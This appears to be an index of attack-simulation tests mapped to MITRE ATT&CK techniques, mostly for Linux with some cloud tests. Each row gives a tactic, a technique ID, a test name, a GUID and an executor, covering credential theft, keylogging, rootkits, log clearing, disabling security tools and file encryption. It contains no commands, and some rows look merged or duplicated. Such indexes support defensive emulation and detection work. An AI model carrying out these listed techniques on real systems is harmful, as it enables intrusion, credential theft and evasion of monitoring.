credential-access T1552.004 Private Keys 4 Copy Private SSH Keys with rsync 864bb0b2-6bb5-489a-b43b-a77b3a16d68a sh
credential-access T1552.004 Private Keys 5 Copy the users GnuPG directory with rsync 2a5a0601-f5fb-4e2e-aa09-73282ae6afca sh
credential-access T1003.007 Proc Filesystem 1 Dump individual process memory with sh (Local) 7e91138a-8e74-456d-a007-973d67a0bb80 sh
credential-access T1003.007 Proc Filesystem 2 Dump individual process memory with Python (Local) 437b2003-a20d-4ed8-834c-4964f24eec63 sh
credential-access T1003.007 Proc Filesystem 3 Capture Passwords with MimiPenguin a27418de-bdce-4ebd-b655-38f04842bf0c bash
credential-access T1606.002 SAML Tokens 1 Golden SAML b16a03bc-1089-4dcc-ad98-30fe8f3a2b31 powershell
collection T1560.002 Archive via Library 1 Compressing data using GZip in Python (Linux) 391f5298-b12d-4636-8482-35d9c17d53a8 bash
collection T1560.002 Archive via Library 2 Compressing data using bz2 in Python (Linux) c75612b2-9de0-4d7c-879c-10d7b077072d bash
collection T1560.002 Archive via Library 3 Compressing data using zipfile in Python (Linux) 001a042b-859f-44d9-bf81-fd1c4e2200b0 bash
collection T1560.002 Archive via Library 4 Compressing data using tarfile in Python (Linux) e86f1b4b-fcc1-4a2a-ae10-b49da01458db bash
collection T1560.001 Archive via Utility 5 Data Compressed - nix - zip c51cec55-28dd-4ad2-9461-1eacbc82c3a0 sh
collection T1560.001 Archive via Utility 6 Data Compressed - nix - gzip Single File cde3c2af-3485-49eb-9c1f-0ed60e9cc0af sh
collection T1560.001 Archive via Utility 7 Data Compressed - nix - tar Folder or File 7af2b51e-ad1c-498c-aca8-d3290c19535a sh
collection T1560.001 Archive via Utility 8 Data Encrypted with zip and gpg symmetric 0286eb44-e7ce-41a0-b109-3da516e05a5f sh
collection T1056.001 Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
collection T1056.001 Keylogging 3 Logging bash history to syslog 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 sh
collection T1056.001 Keylogging 4 Bash session based keylogger 7f85a946-a0ea-48aa-b6ac-8ff539278258 sh
collection T1056.001 Keylogging 5 SSHD PAM keylogger 81d7d2ad-d644-4b6a-bea7-28ffe43becca sh
collection T1056.001 Keylogging 6 Auditd keylogger a668edb9-334e-48eb-8c2e-5413a40867af sh
collection T1074.001 Local Data Staging 2 Stage data from Discovery.sh 39ce0303-ae16-4b9e-bb5b-4f53e8262066 bash
collection T1113 Screen Capture 3 X Windows Capture 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac bash
collection T1113 Screen Capture 4 Capture Linux Desktop using Import Tool 9cd1cccb-91e4-4550-9139-e20a586fcea1 bash
4 privilege-escalation T1053.001 At (Linux) 1 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
privilege-escalation T1078.004 Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e gcloud
privilege-escalation T1053.007 Container Orchestration Job 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
privilege-escalation T1053.007 Container Orchestration Job 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
5 privilege-escalation T1053.003 Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
6 privilege-escalation T1053.003 Cron 2 Cron - Add script to all cron subfolders Cron - Add script to cron folder b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
privilege-escalation T1053.003 Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
privilege-escalation T1484.002 Domain Trust Modification 1 Add Federation to Azure AD 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 powershell
privilege-escalation T1574.006 Dynamic Linker Hijacking 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
privilege-escalation T1574.006 Dynamic Linker Hijacking 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
privilege-escalation T1611 Escape to Host 1 Deploy container using nsenter container escape 0b2f9520-a17a-4671-9dba-3bd034099fff sh
7 privilege-escalation T1547.006 Kernel Modules and Extensions 1 Linux - Load Kernel Module via insmod 687dcb93-9656-4853-9c36-9977315e9d23 bash
8 privilege-escalation T1037.004 T1574.006 RC Scripts LD_PRELOAD 2 1 rc.common Shared Library Injection via /etc/ld.so.preload c33f3d80-5f04-419b-a13a-854d1cbdbf3a 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
9 privilege-escalation T1037.004 T1574.006 RC Scripts LD_PRELOAD 3 2 rc.local Shared Library Injection via LD_PRELOAD 126f71af-e1c9-405c-94ef-26a47b16c102 bc219ff7-789f-4d51-9142-ecae3397deae bash
10 privilege-escalation T1548.001 Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
11 privilege-escalation T1548.001 Setuid and Setgid 2 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
12 privilege-escalation T1548.001 Setuid and Setgid 3 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
privilege-escalation T1548.001 Setuid and Setgid 4 Make and modify capabilities of a binary db53959c-207d-4000-9e7a-cd8eb417e072 sh
privilege-escalation T1548.001 Setuid and Setgid 5 Provide the SetUID capability to a file 1ac3272f-9bcf-443a-9888-4b1d3de785c1 sh
13 privilege-escalation T1548.003 Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
14 privilege-escalation T1548.003 Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
15 privilege-escalation T1548.003 Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
16 privilege-escalation T1543.002 Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
privilege-escalation T1543.002 Systemd Service 2 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
privilege-escalation T1053.006 Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
privilege-escalation T1053.006 Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
privilege-escalation T1053.006 Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
17 privilege-escalation T1546.005 Trap 1 Trap a74b2e07-5952-4c03-8b56-56274b076b61 sh
18 privilege-escalation persistence T1546.004 Unix Shell Configuration Modification .bash_profile and .bashrc 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
19 privilege-escalation persistence T1546.004 Unix Shell Configuration Modification .bash_profile and .bashrc 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
20 persistence T1053.001 At (Linux) 1 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
21 persistence T1176 Browser Extensions 1 Chrome (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
22 persistence T1176 Browser Extensions 2 Chrome (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
23 persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
24 persistence T1053.003 Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
25 persistence T1053.003 Cron 2 Cron - Add script to cron folder b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
26 persistence T1547.006 Kernel Modules and Extensions 1 Linux - Load Kernel Module via insmod 687dcb93-9656-4853-9c36-9977315e9d23 bash
27 persistence T1574.006 LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
28 persistence T1574.006 LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
29 persistence T1136.001 Local Account 1 Create a user account on a Linux system 40d8eabd-e394-46f6-8785-b9bfa1d011d2 bash
30 persistence T1136.001 Local Account 5 Create a new user in Linux with `root` UID and GID. a1040a30-d28b-4eda-bd99-bb2861a4616c bash
31 persistence T1098.004 SSH Authorized Keys 1 Modify SSH Authorized Keys 342cc723-127c-4d3a-8292-9c0c6b4ecadc bash
32 persistence T1543.002 Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
33 persistence T1546.005 Trap 1 Trap a74b2e07-5952-4c03-8b56-56274b076b61 sh
34 credential-access T1552.003 Bash History 1 Search Through Bash History 3cfde62b-7c33-4b26-a61e-755d6131c8ce sh
35 credential-access T1552.001 Credentials In Files 2 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
36 credential-access T1040 Network Sniffing 1 Packet Capture Linux 7fe741f7-b265-4951-a7c7-320889083b3e bash
37 credential-access T1552.004 Private Keys 2 Discover Private SSH Keys 46959285-906d-40fa-9437-5a439accd878 sh
38 credential-access T1552.004 Private Keys 3 Copy Private SSH Keys with CP 7c247dc7-5128-4643-907b-73a76d9135c3 sh
39 credential-access T1552.004 Private Keys 4 Copy Private SSH Keys with rsync 864bb0b2-6bb5-489a-b43b-a77b3a16d68a sh
40 defense-evasion T1027.001 Binary Padding 1 Pad Binary to Change Hash - Linux/macOS dd ffe2346c-abd5-4b45-a713-bf5f1ebd573a sh
41 defense-evasion T1070.003 Clear Command History 1 Clear Bash history (rm) a934276e-2be5-4a36-93fd-98adbb5bd4fc sh
42 defense-evasion T1070.003 Clear Command History 2 Clear Bash history (echo) cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 sh
46 defense-evasion T1070.003 Clear Command History 6 Clear history of a bunch of shells 7e6721df-5f08-4370-9255-f06d8a77af4c sh
47 defense-evasion T1070.003 Clear Command History 7 Clear and Disable Bash History Logging 784e4011-bd1a-4ecd-a63a-8feb278512e6 sh
48 defense-evasion T1070.003 Clear Command History 8 Use Space Before Command to Avoid Logging to History 53b03a54-4529-4992-852d-a00b4b7215a6 sh
defense-evasion T1070.003 Clear Command History 9 Disable Bash History Logging with SSH -T 5f8abd62-f615-43c5-b6be-f780f25790a1 sh
49 defense-evasion T1070.002 Clear Linux or Mac System Logs 1 rm -rf 989cc1b1-3642-4260-a809-54f9dd559683 sh
50 defense-evasion T1070.002 Clear Linux or Mac System Logs 2 Overwrite Linux Mail Spool 1602ff76-ed7f-4c94-b550-2f727b4782d4 bash
51 defense-evasion T1070.002 Clear Linux or Mac System Logs 3 Overwrite Linux Log d304b2dc-90b4-4465-a650-16ddd503f7b5 bash
52 defense-evasion T1078.004 T1562.004 Cloud Accounts Disable or Modify System Firewall 1 Creating GCP Service Account and Service Account Key Disable iptables firewall 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e 80f5e701-f7a4-4d06-b140-26c8efd1b6b4 gcloud sh
defense-evasion T1027.004 Compile After Delivery 3 C compile d0377aa6-850a-42b2-95f0-de558d80be57 bash
defense-evasion T1027.004 Compile After Delivery 4 CC compile da97bb11-d6d0-4fc1-b445-e443d1346efe bash
defense-evasion T1027.004 Compile After Delivery 5 Go compile 78bd3fa7-773c-449e-a978-dc1f1500bc52 bash
defense-evasion T1140 Deobfuscate/Decode Files or Information 3 Base64 decoding with Python 356dc0e8-684f-4428-bb94-9313998ad608 sh
defense-evasion T1140 Deobfuscate/Decode Files or Information 4 Base64 decoding with Perl 6604d964-b9f6-4d4b-8ce8-499829a14d0a sh
defense-evasion T1140 Deobfuscate/Decode Files or Information 5 Base64 decoding with shell utilities b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e sh
defense-evasion T1140 Deobfuscate/Decode Files or Information 6 Hex decoding with shell utilities 005943f9-8dd5-4349-8b46-0313c0a9f973 sh
defense-evasion T1562.008 Disable Cloud Logs 1 AWS CloudTrail Changes 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e sh
defense-evasion T1562.008 Disable Cloud Logs 2 Azure - Eventhub Deletion 5e09bed0-7d33-453b-9bf3-caea32bff719 powershell
defense-evasion T1562.008 Disable Cloud Logs 3 Office 365 - Exchange Audit Log Disabled 1ee572f3-056c-4632-a7fc-7e7c42b1543c powershell
defense-evasion T1562.004 Disable or Modify System Firewall 7 Stop/Start UFW firewall fe135572-edcd-49a2-afe6-1d39521c5a9a sh
defense-evasion T1562.004 Disable or Modify System Firewall 8 Stop/Start UFW firewall systemctl 9fd99609-1854-4f3c-b47b-97d9a5972bd1 sh
defense-evasion T1562.004 Disable or Modify System Firewall 9 Turn off UFW logging 8a95b832-2c2a-494d-9cb0-dc9dd97c8bad sh
defense-evasion T1562.004 Disable or Modify System Firewall 10 Add and delete UFW firewall rules b2563a4e-c4b8-429c-8d47-d5bcb227ba7a sh
defense-evasion T1562.004 Disable or Modify System Firewall 11 Edit UFW firewall user.rules file beaf815a-c883-4194-97e9-fdbbb2bbdd7c sh
defense-evasion T1562.004 Disable or Modify System Firewall 12 Edit UFW firewall ufw.conf file c1d8c4eb-88da-4927-ae97-c7c25893803b sh
defense-evasion T1562.004 Disable or Modify System Firewall 13 Edit UFW firewall sysctl.conf file c4ae0701-88d3-4cd8-8bce-4801ed9f97e4 sh
defense-evasion T1562.004 Disable or Modify System Firewall 14 Edit UFW firewall main configuration file 7b697ece-8270-46b5-bbc7-6b9e27081831 sh
defense-evasion T1562.004 Disable or Modify System Firewall 15 Tail the UFW firewall log file 419cca0c-fa52-4572-b0d7-bc7c6f388a27 sh
53 defense-evasion T1562.001 Disable or Modify Tools 1 Disable syslog 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 sh
54 defense-evasion T1562.001 Disable or Modify Tools 2 Disable Cb Response ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 sh
55 defense-evasion T1562.001 Disable or Modify Tools 3 Disable SELinux fc225f36-9279-4c39-b3f9-5141ab74f8d8 sh
56 defense-evasion T1562.001 Disable or Modify Tools 4 Stop Crowdstrike Falcon on Linux 828a1278-81cc-4802-96ab-188bf29ca77d sh
defense-evasion T1562.001 Disable or Modify Tools 25 office-365-Disable-AntiPhishRule b9bbae2c-2ba6-4cf3-b452-8e8f908696f3 powershell
defense-evasion T1484.002 Domain Trust Modification 1 Add Federation to Azure AD 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 powershell
defense-evasion T1574.006 Dynamic Linker Hijacking 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
defense-evasion T1574.006 Dynamic Linker Hijacking 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
57 defense-evasion T1070.004 File Deletion 1 Delete a single file - Linux/macOS 562d737f-2fc6-4b09-8c2a-7f8ff0828480 sh
58 defense-evasion T1070.004 File Deletion 2 Delete an entire folder - Linux/macOS a415f17e-ce8d-4ce2-a8b4-83b674e7017e sh
59 defense-evasion T1070.004 File Deletion 3 Overwrite and delete a file with shred 039b4b10-2900-404b-b67f-4b6d49aa6499 sh
60 defense-evasion T1070.004 File Deletion 8 Delete Filesystem - Linux f3aa95fe-4f10-4485-ad26-abf22a764c52 bash
61 defense-evasion T1562.003 HISTCONTROL 1 Disable history collection 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 sh
62 defense-evasion T1562.003 HISTCONTROL 2 Mac HISTCONTROL 468566d5-83e5-40c1-b338-511e1659628d manual
63 defense-evasion T1564.001 Hidden Files and Directories 1 Create a hidden file in a hidden directory 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be sh
defense-evasion T1562.003 Impair Command History Logging 1 Disable history collection 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 sh
defense-evasion T1562.003 Impair Command History Logging 2 Mac HISTCONTROL 468566d5-83e5-40c1-b338-511e1659628d manual
64 defense-evasion T1562.006 Indicator Blocking 1 Auditing Configuration Changes on Linux Host 212cfbcf-4770-4980-bc21-303e37abd0e3 bash
65 defense-evasion T1562.006 Indicator Blocking 2 Logging Configuration Changes on Linux Host Lgging Configuration Changes on Linux Host 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c bash
66 defense-evasion T1553.004 Install Root Certificate 1 Install root CA on CentOS/RHEL 9c096ec4-fd42-419d-a762-d64cc950627e sh
67 defense-evasion T1553.004 Install Root Certificate 2 Install root CA on Debian/Ubuntu 53bcf8a0-1549-4b85-b919-010c56d724ff sh
68 defense-evasion T1574.006 LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
69 defense-evasion T1574.006 LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
70 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 1 chmod - Change file or folder mode (numeric mode) 34ca1464-de9d-40c6-8c77-690adf36a135 bash
71 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 2 chmod - Change file or folder mode (symbolic mode) fc9d6695-d022-4a80-91b1-381f5c35aff3 bash
72 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 3 chmod - Change file or folder mode (numeric mode) recursively ea79f937-4a4d-4348-ace6-9916aec453a4 bash
76 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 7 chown - Change file or folder mode ownership only 967ba79d-f184-4e0e-8d09-6362b3162e99 bash
77 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 8 chown - Change file or folder ownership recursively 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 bash
78 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 9 chattr - Remove immutable file attribute e7469fe2-ad41-4382-8965-99b94dd3c13f sh
defense-evasion T1036.005 Match Legitimate Name or Location 1 Execute a process from a directory masquerading as the current parent directory. 812c3ab8-94b0-4698-a9bf-9420af23ce24 sh
79 defense-evasion T1027 Obfuscated Files or Information 1 Decode base64 Data into Script f45df6be-2e1e-4136-a384-8f18ab3826fb sh
defense-evasion T1556.003 Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
defense-evasion T1556.003 Pluggable Authentication Modules 2 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
80 defense-evasion T1036.003 Rename System Utilities 2 Masquerading as Linux crond process. a315bfff-7a98-403b-b442-2ea1b255e556 sh
81 defense-evasion T1014 Rootkit 1 Loadable Kernel Module based Rootkit dfb50072-e45a-4c75-a17e-a484809c8553 sh
82 defense-evasion T1014 Rootkit 2 Loadable Kernel Module based Rootkit 75483ef8-f10f-444a-bf02-62eb0e48db6f sh
83 defense-evasion T1548.001 Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
84 defense-evasion T1548.001 Setuid and Setgid 2 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
85 defense-evasion T1548.001 Setuid and Setgid 3 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
defense-evasion T1548.001 Setuid and Setgid 4 Make and modify capabilities of a binary db53959c-207d-4000-9e7a-cd8eb417e072 sh
defense-evasion T1548.001 Setuid and Setgid 5 Provide the SetUID capability to a file 1ac3272f-9bcf-443a-9888-4b1d3de785c1 sh
defense-evasion T1036.006 Space after Filename 2 Space After Filename b95ce2eb-a093-4cd8-938d-5258cef656ea bash
86 defense-evasion T1548.003 Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
87 defense-evasion T1548.003 Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
88 defense-evasion T1548.003 Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
92 defense-evasion T1070.006 Timestomp 3 Set a file's creation timestamp 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b sh
93 defense-evasion T1070.006 Timestomp 4 Modify file timestamps using reference file 631ea661-d661-44b0-abdb-7a7f3fc08e50 sh
94 impact T1485 Data Destruction 2 macOS/Linux - Overwrite file with DD 38deee99-fd65-4031-bec8-bfa4f9f26146 bash
impact T1486 Data Encrypted for Impact 1 Encrypt files using gpg (Linux) 7b8ce084-3922-4618-8d22-95f996173765 bash
impact T1486 Data Encrypted for Impact 2 Encrypt files using 7z (Linux) 53e6735a-4727-44cc-b35b-237682a151ad bash
impact T1486 Data Encrypted for Impact 3 Encrypt files using ccrypt (Linux) 08cbf59f-85da-4369-a5f4-049cffd7709f bash
impact T1486 Data Encrypted for Impact 4 Encrypt files using openssl (Linux) 142752dc-ca71-443b-9359-cf6f497315f1 bash
95 impact T1496 Resource Hijacking 1 macOS/Linux - Simulate CPU Load with Yes 904a5a0e-fb02-490d-9f8d-0e256eb37549 bash
96 impact T1529 System Shutdown/Reboot 3 Restart System via `shutdown` - macOS/Linux 6326dbc4-444b-4c04-88f4-27e94d0327cb bash
97 impact T1529 System Shutdown/Reboot 4 Shutdown System via `shutdown` - macOS/Linux 4963a81e-a3ad-4f02-adda-812343b351de bash
101 impact T1529 System Shutdown/Reboot 8 Shutdown System via `poweroff` - Linux 73a90cd2-48a2-4ac5-8594-2af35fa909fa bash
102 impact T1529 System Shutdown/Reboot 9 Reboot System via `poweroff` - Linux 61303105-ff60-427b-999e-efb90b314e41 bash
103 discovery T1217 Browser Bookmark Discovery 1 List Mozilla Firefox Bookmark Database Files on Linux 3a41f169-a5ab-407f-9269-abafdb5da6c2 sh
104 discovery T1083 File and Directory Discovery 3 Nix File and Directory Discovery Nix File and Diectory Discovery ffc8b249-372a-4b74-adcd-e4c0430842de sh
105 discovery T1083 File and Directory Discovery 4 Nix File and Directory Discovery 2 13c5e1ae-605b-46c4-a79f-db28c77ff24e sh
106 discovery T1087.001 Local Account 1 Enumerate all accounts (Local) f8aab3dd-5990-4bf8-b8ab-2226c951696f sh
107 discovery T1087.001 Local Account 2 View sudoers access fed9be70-0186-4bde-9f8a-20945f9370c2 sh
112 discovery T1069.001 Local Groups 1 Permission Groups Discovery (Local) 952931a4-af0b-4335-bbbe-73c8c5b327ae sh
113 discovery T1046 Network Service Scanning 1 Port Scan 68e907da-2539-48f6-9fc9-257a78c05540 sh
114 discovery T1046 Network Service Scanning 2 Port Scan Nmap 515942b0-a09f-4163-a7bb-22fefb6f185f sh
115 discovery T1135 Network Share Discovery 2 1 Network Share Discovery - linux Network Share Discovery 875805bc-9e86-4e87-be86-3a5527315cae f94b5ad9-911c-4eff-9718-fd21899db4f7 bash sh
116 discovery T1040 Network Sniffing 1 Packet Capture Linux 7fe741f7-b265-4951-a7c7-320889083b3e bash
117 discovery T1201 Password Policy Discovery 1 Examine password complexity policy - Ubuntu 085fe567-ac84-47c7-ac4c-2688ce28265b bash
118 discovery T1201 Password Policy Discovery 2 Examine password complexity policy - CentOS/RHEL 7.x 78a12e65-efff-4617-bc01-88f17d71315d bash
121 discovery T1057 Process Discovery 1 Process Discovery - ps 4ff64f0b-aaf2-4866-b39d-38d9791407cc sh
122 discovery T1018 Remote System Discovery 6 Remote System Discovery - arp nix acb6b1ff-e2ad-4d64-806c-6c35fe73b951 sh
123 discovery T1018 Remote System Discovery 7 Remote System Discovery - sweep 96db2632-8417-4dbb-b8bb-a8b92ba391de sh
discovery T1018 Remote System Discovery 12 Remote System Discovery - ip neighbour 158bd4dd-6359-40ab-b13c-285b9ef6fa25 sh
discovery T1018 Remote System Discovery 13 Remote System Discovery - ip route 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1 sh
discovery T1018 Remote System Discovery 14 Remote System Discovery - ip tcp_metrics 6c2da894-0b57-43cb-87af-46ea3b501388 sh
124 discovery T1518.001 Security Software Discovery 4 Security Software Discovery - ps (Linux) 23b91cd2-c99c-4002-9e41-317c63e024a2 sh
125 discovery T1497.001 System Checks 1 Detect Virtualization Environment (Linux) dfbd1a21-540d-4574-9731-e852bd6fe840 sh
126 discovery T1082 System Information Discovery 3 List OS Information cccb070c-df86-4216-a5bc-9fb60c74e27c sh
127 discovery T1082 System Information Discovery 4 Linux VM Check via Hardware 31dad7ad-2286-4c02-ae92-274418c85fec bash
128 discovery T1082 System Information Discovery 5 Linux VM Check via Kernel Modules 8057d484-0fae-49a4-8302-4812c4f1e64e bash
129 discovery T1082 System Information Discovery 7 Hostname Discovery 486e88ea-4f56-470f-9b57-3f4d73f39133 bash
discovery T1082 System Information Discovery 11 Environment variables discovery on macos and linux fcbdd43f-f4ad-42d5-98f3-0218097e2720 sh
130 discovery T1016 System Network Configuration Discovery 3 System Network Configuration Discovery c141bbdb-7fca-4254-9fd6-f47e79447e17 sh
131 discovery T1049 System Network Connections Discovery 3 System Network Connections Discovery Linux & MacOS 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 sh
132 discovery T1033 System Owner/User Discovery 2 System Owner/User Discovery 2a9b677d-a230-44f4-ad86-782df1ef108c sh
persistence T1098 Account Manipulation 3 AWS - Create a group and add a user to that group 8822c3b0-d9f9-4daf-a043-49f110a31122 sh
persistence T1098 Account Manipulation 4 Azure - adding user to Azure AD role 0e65ae27-5385-46b4-98ac-607a8ee82261 powershell
persistence T1098 Account Manipulation 5 Azure - adding service principal to Azure AD role 92c40b3f-c406-4d1f-8d2b-c039bf5009e4 powershell
persistence T1098 Account Manipulation 6 Azure - adding user to Azure role in subscription 1a94b3fc-b080-450a-b3d8-6d9b57b472ea powershell
persistence T1098 Account Manipulation 7 Azure - adding service principal to Azure role in subscription c8f4bc29-a151-48da-b3be-4680af56f404 powershell
persistence T1098 Account Manipulation 8 AzureAD - adding permission to application 94ea9cc3-81f9-4111-8dde-3fb54f36af4b powershell
persistence T1098.001 Additional Cloud Credentials 1 Azure AD Application Hijacking - Service Principal b8e747c3-bdf7-4d71-bce2-f1df2a057406 powershell
persistence T1098.001 Additional Cloud Credentials 2 Azure AD Application Hijacking - App Registration a12b5531-acab-4618-a470-0dafb294a87a powershell
persistence T1098.001 Additional Cloud Credentials 3 AWS - Create Access Key and Secret Key 8822c3b0-d9f9-4daf-a043-491160a31122 sh
persistence T1053.001 At (Linux) 1 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
persistence T1176 Browser Extensions 1 Chrome (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
persistence T1176 Browser Extensions 2 Chrome (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
persistence T1136.003 Cloud Account 1 AWS - Create a new IAM user 8d1c2368-b503-40c9-9057-8e42f21c58ad sh
persistence T1078.004 Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e gcloud
persistence T1053.007 Container Orchestration Job 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
persistence T1053.007 Container Orchestration Job 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
persistence T1053.003 Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
persistence T1053.003 Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
persistence T1053.003 Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
persistence T1574.006 Dynamic Linker Hijacking 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
persistence T1574.006 Dynamic Linker Hijacking 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
persistence T1547.006 Kernel Modules and Extensions 1 Linux - Load Kernel Module via insmod 687dcb93-9656-4853-9c36-9977315e9d23 bash
persistence T1136.001 Local Account 1 Create a user account on a Linux system 40d8eabd-e394-46f6-8785-b9bfa1d011d2 bash
persistence T1136.001 Local Account 5 Create a new user in Linux with `root` UID and GID. a1040a30-d28b-4eda-bd99-bb2861a4616c bash
persistence T1556.003 Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
persistence T1556.003 Pluggable Authentication Modules 2 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
persistence T1037.004 RC Scripts 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
persistence T1037.004 RC Scripts 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 bash
persistence T1098.004 SSH Authorized Keys 1 Modify SSH Authorized Keys 342cc723-127c-4d3a-8292-9c0c6b4ecadc bash
persistence T1543.002 Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
persistence T1543.002 Systemd Service 2 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
persistence T1053.006 Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
persistence T1053.006 Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
persistence T1053.006 Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
